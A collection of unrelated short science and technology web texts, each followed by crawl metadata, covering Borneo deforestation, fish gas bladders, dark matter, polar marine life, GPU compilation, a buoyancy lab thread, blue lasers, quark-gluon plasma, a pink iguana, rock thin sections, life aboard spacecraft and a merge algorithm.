Media outlets from all around the world have reported on this paper, including: BBC; Scientific American; New York Times; Los Angeles Times; Washington Post; Reuters; The Jakarta Post; Associated Press; China Post; CNBC; Science Daily; The Huffington Post; CBS News; Chicago Tribune; Jakarta Globe; Indonesia Post; Kansas City Star; The Boston Globe; Yahoo News; Taiwan News; Southern Ledger; SeattlePI; WCTV; The Monterey Herald; Seattle Times; San Francisco Chronicle; Newsday; Baltimore Sun; Forbes; Agence France Presse-English; Agencia EFE (Spain); Reuters-Portuguese; RedOrbit; WNYT News Channel 13; Star Tribune; Salem Radio Network News; ClearNet Business (NZ); NewsER; Fort Mill Times; First Science; FAO United Nations: Forest News; WTOP 103.5; Intell Asia; Journal Gazette; The Daily Reflector; The Star; Statesman; World Environment News; Fox 13 Now; Straits Times; Environmental News Network; KSTP News; The News Tribune; KSL News Radio; Daily Advance; Science Daily; Sun Sentinel; AL; Sulekha; Morning Star; Planet Ark; News Guide; Terra Daily; PhysOrg; Mongabay.com
One reason for the rapid loss of species-rich tropical forests is the high opportunity cost of forest protection. In Kalimantan (Indonesian Borneo), the expansion of high-revenue oil palm (Elaeis guineensis) plantations currently threatens 3.3 million ha of forest. We estimate that payments for Reduced Emissions from Deforestation and forest Degradation (REDD) could offset the costs of stopping this deforestation at carbon prices of US$10–33 per tonne of CO2, or $2–16 per tonne if forest conservation targets only cost-efficient areas. Forty globally threatened mammals are found within these planned plantations, including the Bornean orangutan (Pongo pygmaeus) and the Borneo pygmy elephant (Elephas maximus borneensis). Cost-efficient areas for emissions reductions also contain higher-than-average numbers of threatened mammals, indicating that there may be synergies between mitigating climate change and conserving biodiversity. While many policy and implementation issues need clarification, our economic assessment suggests that REDD could offer a financially realistic lifeline for Kalimantan's threatened mammals if it is included in future climate agreements.
Biologists call for a network of protected rivers ("Los biólogos reclaman una red de ríos protegidos") - Virgilio Hermoso and Simon Linke.
Bikini corals recover from atomic blast
Half a century after the last earth-shattering atomic blast shook the Pacific atoll of Bikini, the corals are flourishing again. Some coral species, however, appear to be locally extinct. Read the full report by Zoe Richards from JCU and Maria Beger, UQ & AEDA
<urn:uuid:bfd304d6-555c-44b4-bbef-08f4f2f98a6a>
2.796875
2,325
Content Listing
Science & Tech.
42.012942
What is a gas bladder?
If you have found a strange balloon-like object washed up on the beach, you may be looking at a fish's gas bladder. The images show a gas bladder found by P. Merrick on Avoca Beach in January 2005. It is the gas bladder of a Porcupinefish (often called Spiny Pufferfish or Burrfishes). The gas bladder (also called a swim bladder) is a flexible-walled, gas-filled sac located in the dorsal portion of the body cavity. It controls the fish's buoyancy and in some species is important for hearing. Most of the gas bladder is not permeable to gases, because it is poorly vascularised (has few blood vessels) and is lined with sheets of guanine crystals. Spiny Pufferfish gas bladders are not commonly encountered. Only a few examples of Porcupinefish gas bladders have been brought to the Australian Museum for identification during the last twenty years.
Mark McGrouther, Collection Manager, Ichthyology
<urn:uuid:8c4e680e-3216-4dd5-85f4-bed4c6060102>
3.4375
213
Knowledge Article
Science & Tech.
52.653696
In the 1970s, an astronomer called Vera Rubin was measuring the velocities of stars in other galaxies and noticed something strange: the stars at the galaxies' edges moved faster than had been predicted. To reconcile her observations with the law of gravity, scientists proposed that there is matter we can't see and called it dark matter. Physicists are racing to find subatomic particles that could be the missing dark matter, which is thought to make up about 26% of the energy density of the Universe.
Image: A computer-generated image of dark matter's potential distribution across millions of light years of space
Invisible matter helps to hold the Universe together. BBC News reports from Boulby mine. The particle detectors used for the UK Dark Matter Collaboration experiment are housed in a mine deep under the North Yorkshire Moors. The BBC's David Shukman finds out what the scientists are hoping to learn.
Dark matter is measured with gravitational lenses. Hubble Space Telescope images provide evidence of dark matter's existence. Light from distant galaxies is bent by a gravitational lens created by the dark matter's mass in nearby galaxies.
Scientists hunt for elusive particles in a Yorkshire mine. Professor Tim Sumner explains how he hunts for elusive dark matter particles in Boulby mine in Yorkshire.
Patrick Moore and his guests discuss galaxies. Sir Patrick Moore and his guests explain what galaxies are and discuss some of their interesting features.
Scientists are puzzled by missing matter. In the 1970s, Professors James Peebles and Jeremiah Ostriker's computer model simulations of galaxies suggested that there are large amounts of unaccounted-for matter in the Universe. However, their ideas did not gain wider acceptance until Vera Rubin's measurements of the speeds of stars in galaxies also suggested that there is missing matter, which is now known as dark matter. ["The size and mass of galaxies and the mass of the universe" copyright Ostriker and Peebles - The Astrophysical Journal 193 / "Dark Matter and the origin of galaxies and globular star clusters" copyright Peebles - The Astrophysical Journal 277: 470-477]
In astronomy and cosmology, dark matter is a type of matter hypothesized to account for a large part of the total mass in the universe. Dark matter cannot be seen directly with telescopes; evidently it neither emits nor absorbs light or other electromagnetic radiation at any significant level. Instead, its existence and properties are inferred from its gravitational effects on visible matter, radiation, and the large-scale structure of the universe. According to the Planck mission team, and based on the standard model of cosmology, the total mass-energy of the universe contains 4.9% ordinary matter, 26.8% dark matter and 68.3% dark energy. Thus, dark matter is estimated to constitute 84.5% of the total matter in the universe. Dark matter came to the attention of astrophysicists due to discrepancies between the mass of large astronomical objects determined from their gravitational effects, and the mass calculated from the "luminous matter" they contain: stars, gas and dust. It was first postulated by Jan Oort in 1932 to account for the orbital velocities of stars in the Milky Way, and by Fritz Zwicky in 1933 to account for evidence of "missing mass" in the orbital velocities of galaxies in clusters.
Subsequently, many other observations have indicated the presence of dark matter in the universe, including the rotation speeds of galaxies measured by Vera Rubin in the 1960s-1970s, gravitational lensing of background objects by galaxy clusters such as the Bullet Cluster, the temperature distribution of hot gas in galaxies and clusters of galaxies, and, more recently, the pattern of anisotropies in the cosmic microwave background. According to the consensus among cosmologists, dark matter is composed primarily of a not yet characterized type of subatomic particle. The search for this particle, by a variety of means, is one of the major efforts in particle physics today. Although the existence of dark matter is generally accepted by the mainstream scientific community, there is no generally agreed direct detection of it. Alternative theories of gravity, including MOND and TeVeS, have been proposed to explain the anomalies for which dark matter is otherwise invoked. On 3 April 2013, NASA scientists reported that hints of dark matter may have been detected by the Alpha Magnetic Spectrometer on the International Space Station. According to the scientists, "The first results from the space-borne Alpha Magnetic Spectrometer confirm an unexplained excess of high-energy positrons in Earth-bound cosmic rays."
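To see concretely why flat rotation curves point to unseen mass, here is a brief Python sketch (the galaxy numbers are illustrative assumptions, not measurements) comparing the Keplerian prediction v = sqrt(GM/r) with the flat curves Rubin observed:

import numpy as np

G = 6.674e-11              # gravitational constant, m^3 kg^-1 s^-2
M_lum = 1.5e41             # assumed luminous mass, kg (roughly 10^11 Suns)
kpc = 3.086e19             # one kiloparsec in metres

r = np.linspace(5, 50, 10) * kpc          # radii from 5 to 50 kpc

# Keplerian prediction: if nearly all mass sits inside r, v falls as 1/sqrt(r)
v_kepler = np.sqrt(G * M_lum / r)

# A flat curve at ~220 km/s instead requires enclosed mass growing with r
v_flat = 220e3                            # m/s, a typical spiral rotation speed
M_needed = v_flat**2 * r / G              # from v^2 = G M(r) / r

for ri, vk, Mn in zip(r, v_kepler, M_needed):
    print(f"r = {ri/kpc:4.1f} kpc  v_kepler = {vk/1e3:5.1f} km/s  "
          f"mass needed = {Mn/M_lum:4.1f} x luminous")

The required enclosed mass grows roughly linearly with radius, which is the dark-halo inference in a nutshell.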
<urn:uuid:7aa16ff2-5ece-44c5-994f-44048a949d95>
4.34375
940
Knowledge Article
Science & Tech.
32.832429
The prolific zooplankton of Antarctic waters feed on the copious phytoplankton and, in turn, form the basic diet of whales, seals, fish, squid, and seabirds. The Antarctic waters, because of their upwelled nutrients, are more than seven times as productive as subantarctic waters. The most important organism in the higher food chain is the small, shrimplike krill, Euphausia superba, only...
The Arctic Circle, a parallel of latitude, has little value in understanding the distribution and limits of the marine Arctic flora and fauna. Its only significance lies in its relationship to the seasonal behaviour of light, which is of only limited importance and has nothing to do with temperature—which is extremely important—or, in the case of marine fauna, with salinity. The...
The only major groups of aquatic animals conspicuously absent from inland waters include the phyla Echinodermata, Ctenophora, and Hemichordata. Several other major groups of aquatic animals, as well as plants, are markedly less diverse in inland waters than they are in the sea: Notable among the animals are the phyla Porifera (sponges), Cnidaria, and Bryozoa (moss animals) and among the plants...
...Although a minimum number of ions must be present in the cytoplasm for the cell to function properly, excessive concentrations of ions will impair cellular functioning. Organisms that live in aquatic environments and whose integument is permeable to water, therefore, must be able to contend with osmotic pressure. This pressure arises if two solutions of unequal solute concentration exist...
<urn:uuid:85d13ed8-a28c-41b1-9cd5-ae3c61f357bc>
3.265625
407
Content Listing
Science & Tech.
38.282625
How We Should Program GPGPUs
Listing 3. Fortran Matrix Multiplication Loop, Tagged to Be Compiled for the Accelerator
!$acc begin
do i = 1,n1
  do k = 1,n3
    c(i,k) = 0.0
    do j = 1,n2
      c(i,k) = c(i,k) + a(i,j) * b(j,k)
    enddo
  enddo
enddo
!$acc end
Although a compiler may be able to determine or estimate compute intensity, there are enough issues with GPU computing that it's better to leave this step to the programmer. Let's suppose a programmer can add a pragma or directive to the program, telling the compiler that a particular routine or loop or region of code should be compiled for the GPU.
The second step is data analysis on the region: what data needs to be allocated on the device memory, and what needs to be copied from the host and back to the host afterward? This is within the scope of current compiler technology, though peculiar coding styles can defeat the analysis. In such cases, the compiler reports usage patterns with strange boundary conditions; usually, it's easy to determine where this comes from and adjust the program to avoid it. In many cases, it arises from a potential bug lurking in the code, such as a hard-coded constant in one place instead of the symbolic value used everywhere else. Nonetheless, the compiler must have a mechanism to report the data analysis results, and the user must be able to override those results in cases where the compiler is being too conservative (and moving too much data, for example).
The third step is parallelism analysis on the loops in the region. The GPU's speed comes from structured parallelism, so parallelism must be rampant for the translation to succeed, whether translated automatically or manually. Traditional vectorizing and parallelizing compiler techniques are mature enough to apply here. Although vectorizing compilers were quite successful, both practically and commercially, automatic parallelization for multiprocessors has been less so. Much of that failure has been due to over-aggressive expectations. Compilers aren't magic; they can't find parallelism that isn't there and may not find parallelism that's been cleverly hidden or disguised by such tricks as pointer arithmetic. Yet parallelism analysis for GPUs has three advantages. First, the application domain is likely to be self-selected to include those with lots of rampant, structured parallelism. Second, structured parallelism is exactly the domain where the classical compiler techniques apply. And finally, the payoff for success is high enough that even when automatic parallelization fails, if the compiler reports that failure specifically enough, the programmer can rewrite that part of the code to enable the compiler to proceed.
The fourth step is to map the program parallelism onto the machine. Today's GPUs have two or three levels of parallelism. For instance, the NVIDIA G80 architecture has multiprocessor (MIMD) parallelism across the 16 processors. It also has SIMD parallelism within each processor, and it uses another level of parallelism to enable multithreading within a processor to tolerate the long global memory latencies. The loop-level program parallelism must map onto the machine in such a way as to optimize, as much as possible, the performance features of the machine. On the NVIDIA, this means mapping a loop with stride-1 memory accesses to the SIMD-level parallelism and mapping a loop that requires synchronization to the multithread-level parallelism. This step is likely very specific to each GPU or accelerator.
The fifth step is to generate the GPU code.
This is more difficult than code generation for a CPU only because the GPU is less general. Otherwise, this uses standard code-generation technology. A single GPU region may generate several GPU kernels to be invoked in order from the host. Some of the code-generation goals can be different from those of a CPU. For instance, a CPU has a fixed number of registers; compilers often will use an extra register if it allows them to schedule instructions more advantageously. A GPU has a large number of registers, but it has to share them among the simultaneously active threads. We want a lot of active threads, so when one thread is busy with a global memory access, the GPU has other work to keep it busy. Using extra registers may give a better schedule for each thread, but if it reduces the number of active threads, the total performance may suffer.
The final step is to replace the kernel region on the host with device and kernel management code. Most of this will turn into library calls: allocating memory, moving data and invoking kernels.
These five steps are the same ones that a programmer has to perform when moving a program from a host to CUDA or Brook or another GPU-specific language. At least four of them can be mostly or fully automated, which would simplify programming greatly. Perhaps OpenCL, recently submitted by Apple to the Khronos Group for standardization, will address some of these issues.
There are some other issues that still have to be addressed. One is a policy issue: can a user grab the GPU and hold onto it as a dedicated device? In many cases, there is only one user, so sharing the device is unimportant, but in a computing center, this issue will arise. Another issue has to do with the fixed-size, nonvirtual GPU device memory. Whose job is it to split up the computation so it fits onto the GPU? A compiler can apply strip-mining to the loops in the GPU region, processing chunks of data at a time. The compiler also can use this strategy to overlap communication with computation by sending data for the next chunk while the GPU is processing the current chunk. There are other issues that aren't addressed in this article, such as allocating data on the GPU and leaving it there for the life of a program, or managing multiple GPUs from a single host. These can all be solved in the same framework, all without requiring language extensions or wholesale program rewrites.
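The strip-mining idea is easy to sketch in a few lines; this toy Python version (illustrative only: the chunk size and the squaring "kernel" are invented stand-ins, not a real GPU API) shows the chunked structure a compiler would generate:

def strip_mined_sum_of_squares(data, chunk=1024):
    total = 0
    for start in range(0, len(data), chunk):
        strip = data[start:start + chunk]   # a piece sized to fit device memory
        # on a real accelerator, the transfer of the *next* strip could be
        # issued here, overlapping communication with this strip's compute
        total += sum(x * x for x in strip)  # stand-in for the GPU kernel
    return total

print(strip_mined_sum_of_squares(list(range(10_000))))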
<urn:uuid:dd53632f-b772-4eee-bcc4-41dd4541e62a>
2.765625
1,504
Truncated
Software Dev.
43.977042
Wings Don't Generate Lift Through Pressure Differences
Wed Dec 08 12:16:33 GMT 2010 by Jeroen Versteeg
"Wings, whether bird or Boeing, soar because air moves faster over their top sides, reducing the pressure above. The relatively high pressure below pushes upwards, providing lift."
*sigh* this is the popular explanation, but it's wrong! How can airplanes fly upside down if this theory is correct? See http://www.askamathematician.com/?p=1736 or http://www.allstar.fiu.edu/aero/airflylvl3.htm for a thorough explanation.
<urn:uuid:386674f8-88da-4420-a0ab-dbdd2aa821a9>
2.765625
143
Comment Section
Science & Tech.
68.0544
|Nov23-08, 08:04 PM||#1|
Archimedes's Principle Lab
We were doing a lab to test Archimedes's principle, and it said to measure the specific gravity of a sphere using a Jolly balance. However, I fail to see how this is related to Archimedes's principle, since the Jolly balance doesn't measure the displacement of the water or its weight?
What we're doing is comparing the specific gravity of an object found by taking its density (we measured mass and volume) and dividing it by 1, since that's the density of water, with the specific gravity of the same object found by looking at spring elongation on the Jolly balance when not submerged and then fully submerged in water. Can someone explain to me why we're comparing specific gravity when Archimedes's principle is about buoyant force? Thanks! : )
btw, I think I posted this in the wrong place, haha. Sorry, can a mod move it?
|Nov24-08, 05:53 PM||#2|
You measured the volume before you used the Jolly balance. The Jolly balance measures the buoyant force by subtracting the submerged weight from the ordinary weight. So you compare the buoyant force with the volume to check whether Archimedes was right!
|Nov24-08, 06:50 PM||#3|
Now I'm not sure what a Jolly balance is, but I can help with the equations. The buoyant force is equal to gravity times the density of the fluid times the displaced volume. Then you get the density of the submerged object by taking its mass and dividing by the calculated volume.
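Here is a quick numeric sketch of the comparison the second reply describes (all measurements are made up for illustration):

g = 9.81                 # m/s^2
rho_water = 1000.0       # kg/m^3

mass = 0.250             # kg, sphere mass (assumed measurement)
volume = 3.2e-5          # m^3, sphere volume (assumed measurement)

w_air = mass * g                      # ordinary weight
buoyant = rho_water * g * volume      # Archimedes: weight of displaced water
w_submerged = w_air - buoyant         # what the spring should read under water

sg_direct = mass / (rho_water * volume)       # density / density of water
sg_spring = w_air / (w_air - w_submerged)     # from the two spring readings alone
print(sg_direct, sg_spring)                   # identical (~7.8 here), as expected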
<urn:uuid:3a1b3176-966b-4a22-bebc-612dfaecd70c>
3.046875
452
Comment Section
Science & Tech.
53.196235
Ask RP Photonics concerning different kinds of blue lasers. Particular expertise is available for frequency-doubled lasers and for blue upconversion lasers.
Definition: lasers emitting blue light
German: blaue Laser
This article deals with lasers emitting in the blue and violet spectral region, i.e., with a wavelength roughly around 400–500 nm. The choice of laser gain media for such wavelengths is limited, and the achievable performance is typically not as good as in, e.g., the infrared spectral region.
Types of Blue Lasers
The following types of blue lasers are the most common:
- Blue laser diodes, typically based on gallium nitride (GaN) or related materials (e.g. InGaN) and emitting around 400–480 nm, are relatively difficult to produce for high output power and long lifetime. Output powers of tens to hundreds of milliwatts are possible. Currently only a few types of devices are commercially available; the pioneering company is Nichia, followed by Sony and Sharp. The progress in this area is rapid, and it is to be expected that blue laser diodes will continue to exhibit improving performance and lifetime figures and will be widely used. A new development is that of blue-emitting VCSELs.
- Thulium-doped or praseodymium-doped upconversion lasers based on fibers or bulk crystals can emit around 480 nm, typically with some tens of milliwatts of output power and with good beam quality. Further development for powers of hundreds of milliwatts or even multiple watts appears to be feasible.
- Helium–cadmium lasers (which are gas lasers) can emit hundreds of milliwatts in the blue region at 441.6 nm, with high beam quality.
- Blue or violet light can also be generated by frequency doubling (external to the laser resonator or intracavity) the output of lasers emitting around 800–1000 nm; a quick arithmetic check of the wavelengths follows this list. Most frequently used are neodymium-doped lasers, e.g. Nd:YAG emitting at 946 nm (for 473 nm), Nd:YVO4 at 914 nm (for 457 nm), and Nd:YAlO3 at 930 nm (for 465 nm). Common nonlinear crystal materials for frequency doubling with such lasers are LBO, BiB3O6 (BIBO), KNbO3, as well as periodically poled KTP and LiTaO3. Output powers of multiple watts can be obtained, even with single-frequency operation and high beam quality, although less easily than with 1-μm lasers. Instead of a laser, an optical parametric oscillator may be used.
- High-power optically pumped VECSELs are also very attractive laser sources for frequency doubling, with several watts or even tens of watts of output power. Note that other kinds of semiconductor lasers, such as broad-area laser diodes, are available with suitable wavelengths, but are less suitable for frequency doubling due to a typically broader linewidth and poor beam quality. There are some diode lasers, however, which deliver some tens of milliwatts of frequency-doubled light.
- Argon ion lasers, based on laser amplification in an argon plasma (made with an electrical discharge), are fairly powerful light sources for various wavelengths. While the highest power can be achieved in green light at 514 nm, significant power levels of several watts are also available at 488 nm, apart from some weaker lines e.g. at 458, 477 and 497 nm. In any case, the power efficiency of such lasers is very poor, so that tens of kilowatts of electric power are required for multi-watt blue output, and the cooling system has corresponding dimensions. There are smaller tubes for air-cooled argon lasers, requiring hundreds of watts for generating some tens of milliwatts.
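As a sanity check on the frequency-doubled wavelengths quoted above (second-harmonic generation doubles the optical frequency, so the vacuum wavelength halves), here is a trivial sketch:

# lambda_out = lambda_in / 2 for second-harmonic generation
nd_lines_nm = {"Nd:YAG": 946, "Nd:YVO4": 914, "Nd:YAlO3": 930}
for medium, lam in nd_lines_nm.items():
    print(f"{medium}: {lam} nm -> {lam / 2:.0f} nm")   # 473, 457 and 465 nm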
For wavelengths below ≈ 400 nm, the eye's sensitivity (i.e. its ability to detect small light levels) sharply declines, and one enters the region of ultraviolet light. (See also the article on ultraviolet lasers.) Note that even for wavelengths around or slightly above 400 nm, the retina can be damaged via photochemical effects even for intensity levels which are not perceived as very bright.
Applications of Blue and Violet Lasers
Blue and violet lasers are used e.g. in interferometers, for laser printing (e.g. exposure of printing plates) and digital photofinishing, data recording (Blu-ray Disc, holographic memory), in laser microscopy, in laser projection displays (as part of RGB sources), in flow cytometry, and for spectroscopic measurements. Data recording appears to be the major driver for the development of blue laser diodes. In most cases, the use of blue and violet lasers is motivated by the relatively short wavelengths, which allows for strong focusing or resolving very fine structures in imaging applications.
<urn:uuid:07a66219-c11f-428e-8eb7-f809c2e2b49b>
2.875
1,675
Knowledge Article
Science & Tech.
65.811383
By IVARS PETERSON According to modern physics, the first micromoments of the Big Bang were a time of unimaginable extremes. No more than a cosmic spark, the universe was then so extraordinarily hot that the strong nuclear force was too weak to keep quarks bound tightly together in protons and other particles of ordinary matter. Free quarks roamed a thick broth of gluons, particles that carry the strong force. Physicists describe this extreme state of matter as a quark-gluon plasma. Now, they think that they have glimpsed such a state in the laboratory in high-energy collisions between heavy nuclei. Earlier this year, more than 500 physicists gathered in Heidelberg, Germany, for the Quark Matter conference. After hearing results of recent experiments observing collisions between nuclei of lead, many were ready to take seriously the notion that such collisions could produce ultramicroscopic fireballs of quark-gluon plasma. "This represents a considerable change in mind among those who were skeptical of previous results," observes Johann Rafelski of the University of Arizona in Tucson. "It's an exciting moment in a field that has been developing rapidly." "It's very promising, very encouraging," adds theorist Robert L. Sugar of the University of California, Santa Barbara, who has been using computer simulations to study the transition between ordinary matter and the quark-gluon plasma. These findings "highlight an unexpected physical phenomenon that could be the signature of the quark-gluon plasma," says Rafelski. They offer a way of checking whether modern physics is on the right track--that is, whether what physicists hypothesize happened in the aftermath of the Big Bang is consistent with the behavior of subatomic particles. If the experimental results are strengthened and confirmed, says Helmut Satz of the University of Bielefeld in Germany, the Heidelberg meeting may well be remembered for the first report of a "little bang." The nucleus of a lead atom consists of 82 protons and about 124 neutrons. Protons and neutrons, in turn, are composed of quarks. The standard model of particle physics posits that quarks come in six varieties: up, down, charm, strange, bottom, and top. Quarks typically are found in pairs or triplets. A proton, for example, is made up of two up quarks and one down quark, and a neutron is made up of two down quarks and one up quark. Other sorts of particles, called mesons, consist of a quark and an antiquark bound together. Under normal conditions, gluons keep these combinations of quarks from flying apart. At extremely high energies and densities, theory suggests, quarks and gluons begin to mingle freely, breaking out of the confinement that defines protons and other subatomic particles. Obtaining experimental evidence of this state of matter has proved difficult. Only collisions between heavy atomic nuclei traveling at nearly the speed of light produce a central core of particles endowed with large quantities of energy. At the European Laboratory for Particle Physics (CERN) in Geneva, researchers use the Super Proton Synchrotron to strip heavy atoms of their electrons, and they accelerate the bare nuclei at targets composed of various materials. Previous experiments involved sulfur nuclei fired at a sulfur target. The latest round had lead nuclei hitting a lead target at a record energy of 3.6 teraelectronvolts. 
At the Brookhaven National Laboratory's Alternating Gradient Synchrotron in Upton, N.Y., physicists conduct similar experiments using gold projectiles and targets, but at lower energies than at CERN. Their results may establish a lower limit for the quark-gluon plasma. In theory, the energy of a collision should melt the participating nuclei into a blob of plasma. However, because the interaction takes place in a very short time and in a very small space, obtaining detailed information about what would occur inside such a blob has proved troublesome. Researchers have to rely on their observations of the shower of ordinary particles left over after the initial fireball breaks up. By looking at the proportions of different types of particles that emerge, physicists can try to reconstruct the conditions in the fireball. The most striking results presented at the Heidelberg meeting came from the NA50 collaboration at CERN, led by Louis Kluberg of the Ecole Polytechnique in Palaiseau, France. It determined the rate at which lead-lead collisions generate a particular type of particle. A J/psi particle, a meson that consists of a charm quark and its antiparticle counterpart, has such a large mass that it rarely forms in proton-proton collisions, the standard experiment in high-energy physics. In nuclear interactions, however, protons collide repeatedly as the participating nuclei begin to merge, generating larger than normal numbers of J/psi particles. Because they are most often produced in that initial contact between colliding nuclei, J/psi particles end up moving through the remainder of the merged nuclear matter, or blob. By comparing collisions in which these particles travel different distances through this material, researchers can, in a sense, image the blob. In other words, the J/psi particles act like X rays penetrating an opaque object. The NA50 team detected only about half as many J/psi particles as they would have expected if there had not been a high-density, high-temperature environment to break apart quark-antiquark pairs. This finding suggests that at least some fraction of the material in a lead-lead nuclear collision is a quark-gluon plasma. In the Aug. 26 Physical Review Letters, Jean-Paul Blaizot and Jean-Yves Ollitrault of CE-Saclay in Gif-sur-Yvette, France, account for the missing J/psi particles by saying that these particles "melt" in the hot central region of the nuclear fireball. Because current theoretical models of the production and decay of J/psi particles offer conflicting predictions, however, the full implications of these results remain uncertain. "Whatever the final theoretical picture, the experimental effect cannot be argued away," Rafelski remarks. Physicists had previously obtained unconfirmed results that hint at the formation of a quark-gluon plasma in particle collisions (SN: 10/8/88, p. 229). This time, however, a number of different experiments have provided data consistent with the NA50 finding. Six CERN teams studied the same lead-lead collisions that the NA50 collaboration observed. Each one focused on different particles and made different measurements. "Everyone found something that was not easily explainable in terms of conventional physics," Rafelski notes. For example, the WA97 group, led by Emanuele Quercigh of CERN, furnished convincing evidence that far more particles composed of strange quarks were produced than can be accounted for in the absence of a quark-gluon plasma. 
The NA52 collaboration, headed by Klaus Pretzl of the University of Bern in Switzerland, looked at antimatter production in these collisions. The surprisingly large quantities of antiparticles, such as antiprotons and antideuterons, generated in these interactions also suggested an origin in a quark soup of some sort. Each set of findings, though preliminary, contributes to the overall picture of the creation of a quark-gluon plasma at the core of lead-lead collision products. Now, researchers need to refine their results and complete their analyses of the experimental data. A crucial extension of the investigations is the determination of whether there is a sharp transition between the quark-gluon plasma and the confined quark state. It's possible, for example, that a small reduction in the energy of the lead projectiles could stop the production of quark-gluon plasma. Theorists are using the recent data to refine their estimates of the production rates of different quark-based particles under varying conditions during collisions. Experimenters are now preparing to observe low-energy collisions at CERN to see if a threshold for plasma creation exists. As construction of the Large Hadron Collider proceeds (SN: 4/6/96, p. 214), CERN is gradually closing down its experimental program involving heavy nuclei in order to conserve funds. However, researchers are looking forward to completion of the more powerful Relativistic Heavy Ion Collider, now being built at Brookhaven. The increased energy available at that facility and the use of two colliding beams of nuclei instead of one beam and a fixed target should greatly enhance the chances of creating a quark-gluon plasma. The first collisions between nuclei in opposing beams is scheduled to take place at this facility in early 1999. "Progress has been very rapid in the last decade in this field of physics," Rafelski says. "If these projects are carried through, we should have the answer by the turn of the century."
<urn:uuid:a3ea59d8-3734-46b9-ba6f-3825e580d28d>
3.1875
1,881
Truncated
Science & Tech.
35.945707
A recent publication in PNAS conducts a genetic analysis of the pink iguana, or rosada, until now only an anecdotal species (some park rangers in the Galápagos saw one in 1986). It turns out that this form of the land iguana lives only on one particular volcano in the archipelago. Based on analysis of microsatellite and mitochondrial DNA data, the rosada was found to be deeply divergent from the yellow form, which has biologists re-interpreting the evolutionary legacy of this lineage. Based on the estimated population size, this new species would fall into the "critically endangered" category under international conservation standards. Despite 150 years of trekking along the beautiful coasts of these islands, how did scientists miss a huge pink reptile?? Mr. Darwin, perhaps you could elaborate as to why you didn't find the Volcan Wolf an appealing place to explore?
The yellow and rosada iguanas compared. Courtesy of PNAS, doi:10.1073/pnas.0806339106
<urn:uuid:e5ba80cb-d171-4ec9-9d2e-2b3c287c757f>
3.59375
219
Personal Blog
Science & Tech.
42.331858
Definition: Merge n sorted streams into one output stream. All the stream heads are compared, and the head with the least key is removed and written to the output. This is repeated until all streams are empty. See also ideal merge, optimal merge.
Note: The run time is Θ(mn), where m is the total number of elements and n is the number of streams.
If you have suggestions, corrections, or comments, please get in touch with Paul E. Black.
Entry modified 17 December 2004.
Cite this as: Art S. Kagel, "simple merge", in Dictionary of Algorithms and Data Structures [online], Paul E. Black, ed., U.S. National Institute of Standards and Technology. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/simplemerge.html
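A minimal Python sketch of the merge as defined (my illustration, not part of the dictionary entry); the per-element scan over all n stream heads is what gives the Θ(mn) run time:

def simple_merge(streams):
    """streams: a list of already-sorted lists."""
    streams = [list(s) for s in streams]   # copy so the inputs survive
    out = []
    while any(streams):
        # the O(n) scan: find the nonempty stream with the least head
        best = min((s for s in streams if s), key=lambda s: s[0])
        out.append(best.pop(0))
    return out

print(simple_merge([[1, 4, 9], [2, 3], [0, 5, 7]]))
# -> [0, 1, 2, 3, 4, 5, 7, 9]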
<urn:uuid:72c605b2-0b6b-44f7-9680-5e7a4b48f01f>
3.359375
200
Structured Data
Software Dev.
76.854199
September 20, 2012 4:07 pm Scientific American’s Symbiartic blog is celebrating the month of September with a new piece of science art every day. They just highlighted the beautiful MicROCKScopica project, a website created by Bernardo Cesare. Cesare is a professor of petrology at the University of Padova, Italy, and a photographer, who combined his talents in an absolutely stunning way. Cesare’s images are photographs of thin sections (just 0.03 mm thick) of rock illuminated with polarized light. Geologists regularly use polarized light to look at thin sections under a microscope, usually to figure out what kinds of minerals constitute the rock. The image above is of a rock called peridotite. “Peridotite is (volumetrically) the most important rock on Earth as it constitutes its mantle. But we don’t find much as there are some kilometers of crust on top!” Cesare said in an e-mail. The mantle makes up a substantial portion of the interior of the Earth, but geologists have a hard time observing it directly. It’s too deep to take samples, so scientists must make do with the few bits and pieces that make their way to the earth’s surface. (At least until they can drill that far.) But by studying rocks like this one, found in Hungary, scientists can get a better idea of the inner workings of the Earth. Also, it looks cool.
<urn:uuid:c50c405b-0333-4654-9155-0fb4ce85a8b7>
3.515625
350
Personal Blog
Science & Tech.
54.503194
Living in Space Living in a zero-gravity world, millions of miles away from your own planet, must be a really exciting but challenging adventure. In a space shuttle, even the most basic things like taking a shower and sleeping can become very complicated. I did some research to find out what it must be like to float around in a small cramped area, going 7 times as fast as a bullet travels. The clothes that you wear in a space shuttle can be similar to the ones you would wear on Earth, since you only have to wear a space suit if you are outside the spacecraft. One of the differences with clothes inside a space shuttle is that the astronauts don't change them nearly as much as a normal person would on Earth. This is partly because they don't go outside, so they can't get very dirty. It is also partly because it is almost impossible to do laundry in space. The typical astronaut has one pair of shorts and one T-shirt for every three days. When the astronauts do go outside of the space shuttle, they wear space suits. Space suits allow them to breathe where there is no atmosphere. If an astronaut were to wear a space suit on Earth it would weigh about 400 pounds, but since they are in space, it weighs nothing. The second thing you should know about living in space is what the astronauts eat. Most people think that space food would be disgusting, but astronauts eat the same kind of food we eat on Earth. For example, a typical breakfast in space would consist of either granola or pears. A typical lunch might consist of chicken, mac and cheese, rice or nuts. For dinner an astronaut might eat shrimp, steak, mac and cheese or fruit. For drinks astronauts would have water, apple cider, coffee or tea. Water is stored in 90-pound containers that look like duffle bags. The astronauts have to recycle water from the humidity in the air. When you’re in space, it is important to ration and recycle. Sleeping in space is also challenging for the astronauts. They have to attach themselves to a wall, seat, or bunk bed so they don’t float around in their sleep. The astronauts can also sleep in the pilot’s seat. When you’re in space, it doesn’t matter what angle you sleep at, so you can fall asleep standing up just as easily as if you were lying down, as long as you are strapped to something. They also have to sleep in sleeping bags. Living in space sounds hard to get used to. Living in space for a long amount of time is also hard on your body when you return to Earth. This is because you don’t even have to walk, so the astronauts’ muscles get weak. They have to exercise on a treadmill so that this doesn’t happen. Imagine how weird it would be just to be able to float around in mid air. This is why living in space must be a really exciting but challenging adventure.
<urn:uuid:5d2e2f73-fa38-4557-89f5-b9ac0e7f24a0>
3.140625
638
Personal Blog
Science & Tech.
67.550084
